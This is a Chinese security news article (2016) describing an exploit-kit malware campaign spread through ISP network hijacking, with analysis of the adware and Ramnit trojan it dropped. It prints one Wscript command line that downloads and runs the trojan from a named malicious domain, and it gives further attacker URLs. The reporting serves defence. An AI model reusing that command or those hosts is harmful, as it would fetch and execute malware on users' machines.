安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 业界资讯 > 挂马风险预警:运营商再现大规模挂马攻击

挂马风险预警:运营商再现大规模挂马攻击

时间:2016-08-28来源: 作者:点击:
​今年7月,爱拍网等国内知名网站曾遭遇大规模挂马致使敲诈者病毒大肆传播。近日,360互联网安全中心监测到爱拍网挂马事件的幕后黑手再一次出招,虽然手法非常相似,但显然该组织这一


/uploads/allimg/c160828/14H352940A040-39110.png

//copyright AnYun.ORG

今年7月,爱拍网等国内知名网站曾遭遇大规模挂马致使敲诈者病毒大肆传播。近日,360互联网安全中心监测到爱拍网挂马事件的幕后黑手再一次出招,虽然手法非常相似,但显然该组织这一次的行动胃口更大——不再针对某些特定网站进行挂马,而是玩起了网络劫持,导致河南某运营商的8万多用户遭遇恶意推程序的攻击。

//安云网咨询系统

由于网络劫持并不针对特定网站,所以此次挂马事件中,包括IE浏览器、爱奇艺客户端、迅雷、搜狗等在内的任何带有展示网页功能的客户端都存在中招可能。具体挂马行为详见7月中旬的分析报告(http://bobao.360.cn/news/detail/3302.html)。

//内容来自AnYun.ORG

与此前爱拍网挂马事件相似,此次利用的也是EK(Exploit kits)黑客攻击包实现挂马操作。从带有恶意代码的Flash动画到下载回来的执行恶意脚本的js代码都与之前的情况出奇的相似,唯一有区别的是执行js脚本的命令行参数: //ANYUN.ORG

//安云网,anyun.org

Wscript //B //E:JScript GIF.INJExeCute "gexywoaxor" 
"http://www.zhongqiulipin.com/svchost.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 
3.0.30729; .NET4.0C; .NET4.0E)" 

//安云网咨询系统


//ANYUN.ORG

根据js代码,第二个参数为木马下载地址,第一个参数为解密秘钥。 //安云网咨询系统

http://p1.qhimg.com/t013b6461999d455afb.png //ANYUN.ORG

由于换了参数,所以此次传播的木马本体也出现了变化——不再是威力大但“来钱慢”的敲诈者病毒,而变成了简单粗暴“来钱快”的广告推广程序。 //copyright AnYun.ORG

样本解码后被释放到“Documents and Settings”文件夹下的当前用户根目录中,并获取了一个随机的名称再运行该木马。

//内容来自AnYun.ORG


//内容来自安云网

木马运行后会将自己隐藏:

//copyright AnYun.ORG

http://p1.qhimg.com/t016166b9094ef7d249.png

//内容来自AnYun.ORG


//ANYUN.ORG

之后打开注册表,将自己添加为启动项: //copyright AnYun.ORG

http://p1.qhimg.com/t01c42fdf5c3a5c34d5.png //内容来自安云网

http://p9.qhimg.com/t01d76bcb65e2841a16.png //copyright AnYun.ORG

http://p2.qhimg.com/t017a0c12649af7a9aa.png

//安云网,anyun.org


//安云网,anyun.org

实现自启动后,程序便去连接远端页面: //内容来自AnYun.ORG

http://p7.qhimg.com/t01ae2567c89d84ffc9.png //内容来自安云网

http://p8.qhimg.com/t01f29c80b701d52a84.png

//内容来自AnYun.ORG


//安云网咨询系统

拼接后可见访问的页面为:hxxp://b.zhongqiulipin.com/jiating.html,直接用浏览器打开看起来更直观:

//安云网咨询系统

http://p0.qhimg.com/t018aadcf0b5ae24be5.png //安云网,anyun.org


//安云网咨询系统

获取到推广列表后,木马便会依次下载并运行这些推广程序以赚取佣金 //ANYUN.ORG

http://p9.qhimg.com/t017cea2bc4a29830e8.png //安云网咨询系统


//ANYUN.ORG

更恶劣的是,下载列表中不仅有商业推广性质的程序,还带有一些含有恶意代码的程序,而巧合的,这些恶意代码恰恰就是最近刚刚兴起的Ramnit感染型木马:

//内容来自AnYun.ORG

http://p0.qhimg.com/t015775c9daeeeb8cbb.png

//安云网咨询系统


//安云网咨询系统

Ramnit感染型木马显著的特点是入口点在一个含有恶意代码的.rmnet节中,一旦运行则会感染全盘所有可执行程序。该木马的更多分析内容详见: //安云网咨询系统

//内容来自安云网

http://www.tuicool.com/articles/uMZZVzm

//内容来自安云网

根据360互联网安全中心的数据显示,仅昨天(8月23日)一天,该挂马事件影响到的用户量就已超过8万,今天这一数量还在增加。目前,360安全卫士已对该挂马行为实现全面拦截。 //copyright AnYun.ORG

http://p7.qhimg.com/t019b183f4f4cb47a58.png //copyright AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容